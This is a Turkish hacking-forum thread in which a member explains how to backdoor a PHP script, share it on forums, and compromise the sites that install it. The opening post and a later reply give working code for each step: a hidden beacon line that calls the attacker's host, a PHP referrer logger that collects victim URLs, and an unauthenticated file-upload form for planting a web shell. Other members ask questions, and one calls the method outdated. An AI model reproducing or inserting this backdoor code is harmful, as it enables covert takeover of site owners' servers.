İPUCU

PHP Hypertext Processor ile ilgili sanal yönergeler üzerinde geliştirme için tasarlanmış dil ile ilgili dökümanların paylaşım alanı.

Seçenekler

Hacking'de Senaryolar [Website Backdoor]

14-04-2019 20:59
#1
SeLeXuS - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
Linux
Mesajlar:
34
Teşekkür (Etti):
14
Teşekkür (Aldı):
10
Konular:
11
Ticaret:
(0) %
Merhaba Arkadaşlar Ben SeLeXuS
Hacking'de senaryoların önemi çok büyük bu yüzden sizlere bugün bir Senaryo anlatıcağım
Neden Bu kadar Önemli ?
Düşünün bir website yazdınız veya elinizde bir script var bunula bir web site hacklemek istemezmisiniz "Nasılmı ?" diye sorduğunuzu duyar gibiyim.
İlk Önce aklımızdan bir senaryo uyduralım.
yabancı bir forum bulalım ve bu forum website kurmayı bilen bir kitle olsun
ve ellerine bir script verin ne olduğu fark etmez ama ilgi çekici ve kullanmak istiyecekleri bir script olması kitleyi artırır
sonra bu kodu sayfanın indexinde kodların arasına yerleştirin
Kod:
<?php 
echo '<link rel="stylesheet" type="text/css" href="http://siteniz.com/codervb.php">'; 
?>
sonra kendi websitenize bu kodu yerleştirin
Kod:
<?php
$verimiz = $_SERVER["HTTP_REFERER"];
$dosya = "loglar.txt"; 
$dosyam = fopen ($dosya , 'a+') or die ("Dosya a癟覺lamad覺!"); 
$yazi = "$verimiz\n"; 
fwrite($dosyam,$yazi); 
fclose($dosyam); 
?>
bunlar ne işemi yarıyacak hemen anlatıyorum bu kodlar website Url'sini log alıp sizin web sitenizdeki "log.txt" dosyasına kayıt altına alıcak
Url ne işe yarıyacak ?
Bu Fazla Birşey Değil şimdi bu kodu ise websitenin en ücra dosyaları arasına herhangi bir isimle kaydedin
Kod:
<form action="" method="post" enctype="multipart/form-data">
   <input type="file" name="dosya" />
   <input type="submit" value="Gönder" />
</form>
<?
if($_FILES){
            $dosya = $_FILES['dosya']['tmp_name'];
            copy($dosya, $_FILES['dosya']['name']);
            echo 'Tamamdır';
         
    }
?>
bu kod ise size Backdoor yani arka kapı sağlıyacaktır bu kod ile websiteye upload yapabilirsiniz
Shelli yükledikten sonra gerisi sizde zaten.
Kullanıcı İmzası
Yararlı Konum
Tıkla
Konu SeLeXuS tarafından (14-04-2019 22:31 Saat 22:31 ) değiştirilmiştir.
darkness44 Teşekkür etti.

14-04-2019 22:14
#2
IXI - ait Kullanıcı Resmi (Avatar)
IXI
Üye
Üyelik tarihi:
01/2019
Mesajlar:
2
Teşekkür (Etti):
7
Teşekkür (Aldı):
0
Konular:
0
Ticaret:
(0) %
Websitede codervb.php şeklindemi ekliyeceğiz
14-04-2019 22:20
#3
SeLeXuS - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
Linux
Mesajlar:
34
Teşekkür (Etti):
14
Teşekkür (Aldı):
10
Konular:
11
Ticaret:
(0) %
Alıntı:
IXI´isimli üyeden Alıntı Mesajı göster
Websitede codervb.php şeklindemi ekliyeceğiz
Evet local'de dene yapamazsan ÖM'den yaz



















.
Kullanıcı İmzası
Yararlı Konum
Tıkla
15-04-2019 01:28
#4
HackerBeys - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
51. Bölge
Mesajlar:
295
Teşekkür (Etti):
11
Teşekkür (Aldı):
36
Konular:
46
Ticaret:
(0) %
Biraz da açık anlatabilir misin? Tam anlamadım.
Kullanıcı İmzası
Açık kodlu proje, köpek balığına benzer. Hareket etmelidir, yoksa ölür!

HackerBeys
15-04-2019 22:52
#5
SeLeXuS - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
Linux
Mesajlar:
34
Teşekkür (Etti):
14
Teşekkür (Aldı):
10
Konular:
11
Ticaret:
(0) %
Alıntı:
HackerBeys´isimli üyeden Alıntı Mesajı göster
Biraz da açık anlatabilir misin? Tam anlamadım.
bir script seç ve o scriptin index sayfasına 1. kodu ekle siteniz yazan yere kendi siteni ekle
sonra 2. kodu kendi veb sitene codervb.php adı ile kaydet 3. kou ise scriptin içine istediğin ad ile kaydet sakla sonra senin websitede log.txt dosyası oluşacak onun içindeki websiteleri al ve sakladığın 3. kodu çalıştır ve shell upload et
Kullanıcı İmzası
Yararlı Konum
Tıkla
15-04-2019 23:15
#6
byZehirX - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2012
Nereden:
Osmaniye
Yaş:
30
Mesajlar:
9.170
Teşekkür (Etti):
1220
Teşekkür (Aldı):
3186
Konular:
968
Ticaret:
(0) %
Cok Eski Bir Mantık.
Artik hemen hemen her Script forumlarinda bu olaylar nedeni ile bilgi paylasimi ve önemli detaylar anlatilmaktadir ki ( önemli )bir web sitesi kurmak istiyen her harikada script yada tema forumlarina üyelik acıyor oradaki mantiklari anlamak adina bilgi amacli vakit geciriyor neticesinde bu tarz eylemleri orada goruyor ve scriptleri kötü kodlar varmi yok mu taratmasi gerektigini anliyor buda şuanki mevcut yolu tıkıyor.

Ama elbette bazı insanlar (amatör) bu konulari anlamiyor yada önemsemiyor o yüzden işe yarar bir konu oluyor mantık.
Pek ciddi buldugum bir konu degil aslinda suanki makale fakat yinede eline saglik anlatmisin.
İyi forumlar dostlar
Kullanıcı İmzası

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı